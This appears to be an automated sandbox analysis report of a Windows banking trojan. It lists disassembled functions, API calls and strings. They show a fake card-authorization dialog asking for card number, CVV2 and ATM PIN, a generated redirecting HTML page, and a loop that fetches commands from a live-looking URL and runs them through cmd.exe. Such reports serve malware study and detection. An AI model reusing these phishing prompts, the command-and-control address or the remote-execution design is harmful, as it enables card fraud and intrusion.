                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
